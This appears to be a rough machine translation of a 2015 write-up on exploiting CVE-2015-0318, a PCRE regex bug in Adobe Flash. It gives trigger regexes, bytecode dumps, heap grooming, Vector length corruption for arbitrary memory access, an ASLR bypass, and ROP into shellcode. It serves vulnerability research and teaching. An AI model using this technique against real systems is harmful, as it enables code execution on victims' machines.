Blast, 2015/03/02 and

0 x00 preface


Title: (^Exploiting)\s(CVE-2015-0318)\s(in)\ S *(Flash$) Author: Mark Brand

issue 199/PSIRT-3161/CVE-2015-0318

Brief Overview: Flash use PCRE regular type parsing engine (https://github.com/adobe-flash/avmplus/tree/master/pcre, please pay attention to public avmplus code already expired, he had some many other holes have been Adobe repair, Auditing this code can be frustrating).

Note: this engine is obviously buggy, you can see the information about the bug from the issue page above.

0 x01 background


#! c /* For \c, a following letter is upper-cased; then the 0x40 bit is flipped. This coding is ASCII-specific, but then the whole concept of \cx is ASCII-specific. (However, an EBCDIC equivalent has now been added.) */ case 'c': <---- There's no check to see if we're in UTF8 mode c = *(++ PTR); <---- This could be part of a multibyte unicode character if (c == 0) { *errorcodeptr = ERR2; break; } #ifndef EBCDIC /* ASCII coding */ if (c >= 'a' && c <= 'z') c -= 32; c ^= 0x40; #else /* EBCDIC coding */ if (c >= 'a' && c <= 'z') c += 64; c ^= 0xC0; #endif break;Copy the code

Here is what happens when we combine the escape character \c with a multi-byte UTF-8 character. We can simply use “\c\xd0\x80+” to trigger the bug, as follows:

Ѐ \ c + (? 1)Copy the code

When compiled, the following bytecode is generated:

0000 5d0009      93 BRA              [9]
0003 1bc290      27 CHAR             ['\xc2\x90']
0006 201b        32 PLUS             ['\x1b']
0008 80         128 INVALID
0009 540009      84 KET              [9]
000c 00           0 END  
Copy the code

Clearly something is wrong here, but the problem is how to make this invalid bytecode into arbitrary code execution. Unfortunately, if we compare this to the invalid bytecode, the result is that the match fails and the match exits without any further action.

But there is hope, pcre_compile.cpp provides some additional options. I use find_brackets, which iterates from the current bytecode to the end and has a relatively loose default case. Switch’s case Default: block), this case will locate (and populate an offset to) an ordered group, so maybe using this will cause some weird memory corruption or make PCRE bytecode perform differently than normal bytecode.

So let’s look at this example and add a backreference:

\c? 0? 4 + (? 1)Copy the code

We can see this line (https://github.com/adobe-flash/avmplus/blob/master/pcre/pcre_compile.cpp#L1635), which is set to ‘c’ invalid opcode: 0 x80:

#! c /* Add in the fixed length from the table */ code += _pcre_OP_lengths[c][/c];Copy the code

Now, _pcre_OP_lengths is a global array, and the 0x80 offset just lengths across the end of the array. This is handy because it positions itself in front of an array of strings that will be used for internationalization (on both Windows and Linux). In each Flash release, we get an offset of 110 (significantly longer than the length of the valid opcode), so if we can modify the heap, we can move the pointer to the code from the allocated bytecode cache to the data we control. All we have to do is reconfigure find_BRACKET to match the bytecode to the cache we want, and then we can rely on it to help us execute our malicious code.

We have a slight problem: the bytecode matcher will exit the matching process when it encounters invalid bytecode. The solution is to make them an optional group by wrapping them in parentheses:

(\c? 0? 4 +)? (? 2)Copy the code

By properly scheduling the cache for group 2, we can successfully compile the compiler to:

LEGITIMATE HEAP BUFFER
0000 5d001b      93 BRA              [27]
0003 66         102 BRAZERO          
0004 5e000b0001  94 CBRA             [11, 1]
0009 1bc290      27 CHAR             ['\xc2\x90']
000c 201b        32 PLUS             ['\x1b']
000e 80         128 INVALID          
000f 54000b      84 KET              [11]
0012 5c0006      92 ONCE             [6]
0015 510083      81 RECURSE          [131]    <---- this 131 is the bytecode index to recurse to (131 == 0x83, at the start of our groomed heap buffer)
0018 540006      84 KET              [6]
001b 54001b      84 KET              [27]
001e 00           0 END              
…
GROOMED HEAP BUFFER
0083 5e00880002  94 CBRA             [136, 2]
0088 540088      84 KET              [136]
Copy the code

When we execute this regular expression, everything looks fine, because the path we need to execute is:

0000 5d001b 93 BRA [27] 0003 66 102 BRAZERO 0004 5e000b0001 94 CBRA [11, 1] 0009 1bc290 27 CHAR ['\xc2\x90'] <---- Fail, backtrack 0015 510083 81 RECURSE [131] 0083 5e00880002 94 CBRA [136, 2] <---- Now executing inside our groomed heap buffer 0088 540088 84 KET [136] 0018 540006 84 KET [6] 001b 54001b 84 KET  [27] 001e 00 0 ENDCopy the code

So now we can happily insert arbitrary regular expression bytecode between our CBRA and KET in our tuned heap buffer.

The PCRE bytecode interpreter is surprisingly robust, so it took me a long time to find a useful memory corruption point. The main memory access code in the interpreter is checked for validity, and if it hadn’t done so perfectly (there are still plenty of cross-read opportunities, but now we need write permissions), we would probably have used a cross-write to make it do more.

This is the interesting code, there is a group error in the CBRA process, the code is as follows (from pcre_exec. CPP, beautify, remove debug code)

#! c case OP_CBRA: case OP_SCBRA: number = GET2(ecode, 1 + LINK_SIZE); <---- we control number offset = number << 1; <---- we control offset if (offset < md->offset_max) <---- bounds check that offset within offset_vector { save_offset3 = md->offset_vector[md->offset_end - number]; <---- we control number, so if number is 0, we index at md->offset_end, which is one past the end of the array save_capture_last = md->capture_last; if (ES3_Compatible_Behavior) // clear all matches for groups > than this one { // (we only really need to reset all enclosed groups, but // covering all groups > this is harmless because // we interpret from left to right) savedElems = (offset_top > offset ? offset_top - offset : 2); if (savedElems > frame->XoffsetStackSaveMax) { if (frame->XoffsetStackSave ! = frame->XoffsetStackSaveStg) { (pcre_free)(frame->XoffsetStackSave); } frame->XoffsetStackSave = (int *)(pcre_malloc)(savedElems * sizeof(int)); if (frame->XoffsetStackSave == NULL) { RRETURN(PCRE_ERROR_NOMEMORY); } frame->XoffsetStackSaveMax = savedElems; } VMPI_memcpy(offsetStackSave, md->offset_vector + offset, (savedElems * sizeof(int))); for (int resetOffset = offset + 2; resetOffset < offset_top; resetOffset++) { md->offset_vector[resetOffset] = -1; } } else { offsetStackSave[1] = md->offset_vector[offset]; offsetStackSave[2] = md->offset_vector[offset + 1]; savedElems = 0; } md->offset_vector[md->offset_end - number] = eptr - md->start_subject; <---- even better, we write the current length of the match there; this is becoming interesting.Copy the code

So, we can write a DWORD that we control to the offset_vector, and when we do, the offset_vector is usually an on-stack cache allocated in regexpobject. CPP:

#! c ArrayObject* RegExpObject::_exec(Stringp subject, StIndexableUTF8String& utf8Subject, int startIndex, int& matchIndex, int& matchLen) { AvmAssert(subject ! = NULL); int ovector[OVECTOR_SIZE]; <-- int results; int subjectLength = utf8Subject.length();Copy the code

This is not very interesting, and the extra DWORD we wrote isn’t really useful — I didn’t read it, but modern compilers do variable reordering and secure cookies, so it’s almost useless. But we have a simpler way, in this example we will use more matching groups than the number of caches to fill, in which case THE PCRE will allocate an appropriate size of cache on the heap. (The space allocated on the stack is not enough, so the program will allocate a chunk of memory on the heap to ensure that the operation can be performed.)

#! c /* If the expression has got more back references than the offsets supplied can hold, we get a temporary chunk of working store to use during the matching. Otherwise, we can use the vector supplied, rounding down its size to a multiple of 3. */ ocount = offsetcount - (offsetcount % 3); if (re->top_backref > 0 && re->top_backref >= ocount / 3) { ocount = re->top_backref * 3 + 3; md->offset_vector = (int *)(pcre_malloc)(ocount * sizeof(int)); if (md->offset_vector == NULL) { return PCRE_ERROR_NOMEMORY; } using_temporary_offsets = TRUE; DPRINTF(("Got memory to hold back references\n")); } else { md->offset_vector = offsets; } md->offset_end = ocount; md->offset_max = (2 * ocount) / 3; md->offset_overflow = FALSE; md->capture_last = -1;Copy the code

Great. Good things come in pairs. When the allocation size is greater than 99*4=396 bytes, we can almost control a DWORD after a heap is created. Since we need to write to the allocated region after, look at Flash’s heap allocator. It tells us that 504 bytes is the size of the first region we accurately matched, so we need md->top_backref == 41 to get this number. This is as simple as adding a bunch of capture groups and backtracking references.

(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A) (A)\41(\c? 0? 4 +)? (? 43)Copy the code

The other problem we’re going to run into is that Flash doesn’t verify that the regular expression compiles successfully. If the first heap fails, find_BRACKET will not find a single number that matches that group, so compilation will fail. This can be quite complicated when debugging, so we can add a constant at the beginning, So we can use it to test if it compiled successfully.

(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A )(A)(A)(A)(A)\41(\c? 0? 4 +)? (? 70))Copy the code

As we mentioned earlier, we need a heap allocation to get our code right behind the cache location of the bytecode compiled from our supplied re. To make things simpler, we’ll paste the regex behind the cache so that it’s another nice number for Flash’s heap allocator. The next available cell is 576 bytes, adding 2 bytes per character match.

(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A )(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\c? 0? 4 *)? (? 70))Copy the code

We need to make more changes to make this problem work, so we need an easier way to control it. We can adjust the first group to match any number of different characters as follows:

(c01db33f|(B*)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)( A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\c? 0? 4 *)? (? 70))Copy the code

Note: In the vulnerability code, we will arbitrarily replace the B in the selected character. The reason is that Flash will cache the compiled re, whether it succeeds or not. If our allocation fails, we still need to force it to recompile the re.

So, this means that the initial compilation of the bug is done. We already know how to write the byte code payload across this boundary.

0000 5e00010046  94 CBRA             [1, 70]
0005 5e00000000  94 CBRA             [0, 0]
000a 6d         109 ACCEPT
Copy the code

In order to write successfully, the last ACCEPT is required, we need to make group 0 a match, ACCEPT will force the action and have the added benefit of using the least amount of bytecode.

Now, if you look at it all the way down, you might think this thing is a real pain in the ass. In many cases, that’s pretty much where the bug starts: we control the size of the allocation, and we write the length of our match at the end of it, although overwriting a pointer is a pretty annoying thing to do. But the good news is that there is a one-sideshow solution in Flash: Vector. We can allocate objects of any size, and its first DWORD is a length field. When we overwrite the length field, we have no obstacle in the way of generating arbitrary reads and writes, and it is a very stable bug code.

0x01 Compiles the regular


First we need to allocate a large set of buffers of size 504 (the same as our compiled regex) and then fill it with our malicious bytecode:

#! bash _______________________________________________________________________________________ |exploit-bytecode------------|exploit-bytecode------------|exploit-bytecode------------| ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `Copy the code

We then release the second buffer so that we can preserve the next “gap” of just the right size, which can easily be reused by the Flash heap allocator. This is where the allocator might allocate heap space first.

#! bash _______________________________________________________________________________________ |exploit-bytecode------------|FREE |exploit-bytecode------------| ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `Copy the code

So when we try to compile our regex, almost every time we allocate it here, the gap will fill up with a copy of our malicious bytecode, so we construct a bytecode attached to the buffer.

#! bash _______________________________________________________________________________________ |exploit-bytecode------------|ERCP|metadata|regex-bytecode|exploit-bytecode------------| ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `Copy the code

0x02 Runs the regular to destroy the length of the vector


There is also a trick here, we want to have a Vector of size 0xffffFFFF so that we can read and write all memory. Not 0x7fffffff), we actually create a gap that follows two vectors, and their allocation needs to be 576, which is the size of our offset_vector.

#! bash _______________________________________________________________________________________ |length|vector---------------|length|vector---------------|length|vector---------------| ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `Copy the code

Such as:

#! bash _______________________________________________________________________________________ |FREE |length|vector---------------|length|vector---------------| ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `Copy the code

When the regex is executed, the size of the current match (a DWORD) is written to the end of the allocated offset_vector, which then destroys the length field of the first vector.

#! bash _______________________________________________________________________________________ |offset_vector---------------|corrupt|vector--------------|length|vector---------------| ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `Copy the code

We only need to increase the size of the first vector by 1 byte, and we can use the first vector to fully control the second byte:

#! bash _______________________________________________________________________________________ |offset_vector---------------|length+1|vector--------------------|vector---------------| ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` _______________________________________________________________________________________ |offset_vector---------------|length+1|vector---------------|UINT_MAX|vector----------------------- ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `Copy the code

Now that we have access to the memory addresses of all Flash processes, we can pretty much declare Flash dead. Finally, there is one major problem: we don’t know about our very large vectors. Where? Because all memory operations are based on this cached address.

0x03 Where is the broken Vector


Conveniently, the PCRE code will automatically release the cache for the oversized vector before returning actionScript. This means that we can go back to our vector and find a freelist pointer from the free block after it.


|FREE |ptr| |length|vector—|—|—|—|-|UINT_MAX|vector—|—|—|—|—|| ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` ` ` `

This pointer will point to the next available block, which is probably our very large vector. We can check to see if this is true, but we don’t have to, because the block size is so large that it’s a safe bet. So our relative read and write permissions can be converted to full read and write.


|FREE |ptr| |length|vector—|—|—|—|-|UINT_MAX|vector—|—|—|—|—||FREE|ptr| ` \ ` \ ` \ ` | ` ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ` \ ^ ` \ ` \ ` \ ` ` ` ` ` | ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | \ ___ | | 4

0 x04 other


The rest is a simple Windows arbitrary code reading and writing tutorial, if you feel bored, you can skip this section.

1. Find a module


We circumvent ASLR by locating the Vector, but we don’t know where the other stuff is. We need a loaded module that works so we can use its code. One way is to stack spray, but that’s not necessary right now.

The FixedAlloc allocator used by Flash has a nice structure at the beginning of the memory page that contains a static instance that ends up pointing to a C++ class. This instance is originally in the Flash module, so we can use this to locate the Flash module, as detailed in the vulnerability code.

When we have a pointer in the module, we can start from this pointer to find all the MZ tags back, which will identify the individual modules and then retrieve their exported tables, which can be used in our final vulnerability phase

2. Cover


Now that we have bypassed ASLR, if this were a Linux vulnerability and there was no RELRO, we would just have to override a function pointer to the GOT section (see: http://googleprojectzero.blogspot.ch/2014/09/exploiting-cve-2014-0556-in-flash.html), but the Windows are not so convenient technology, By reversing the Flash file, we finally found a place to overwrite it, which is easier to do than on the heap.

If we create an AS class and instantiate it, it will be allocated on the heap, and there will also be a vTABLE pointer to the functions associated with the object. We can create a class with some fixed characteristics and make it easy to find by querying the heap structure and locating the class without risking access to uninitialized memory.

3. Execute the code


A useful feature of the Flash JIT is that if the parameter is a simple native type, it is pushed onto the original stack (just like a normal native function call). This means that by overwriting the function pointer with a bunch of uint arguments we can control a large chunk of the native stack space, and when the function is called, we can ROP directly onto the legitimate stack.

All we need to do is call VirtualProtect to mark the page property of the Vector as executable, put it in our Shellcode, jump in and we’re done.

When calling VirtualProtect, you can create a stack space large enough to return without destroying Flash’s original stack frame by creating some useless variables.

4. Return to the execution flow


How do I return Flash without crashing it? Looking at what we did to the process, if all goes well, we only damaged 3 dWord memory, so it’s still easy to restore execution:

    1. The size of the first vector has been increased by 1
    1. The size of the second vector increased to UINT_MAX
    1. And the function pointer that we changed to our function

When we overwrite the length of the second vector, the first one is fixed immediately. The second one needs to be fixed because Flash free vector may restore all memory… And 3 doesn’t need to be recovered, because it won’t be used anymore.

This means that if we do it right, Flash will barely notice the change before and after the bug is executed, and our ROP will look like a Hook to a Flash function, reverting back to the original Flash function after executing our code.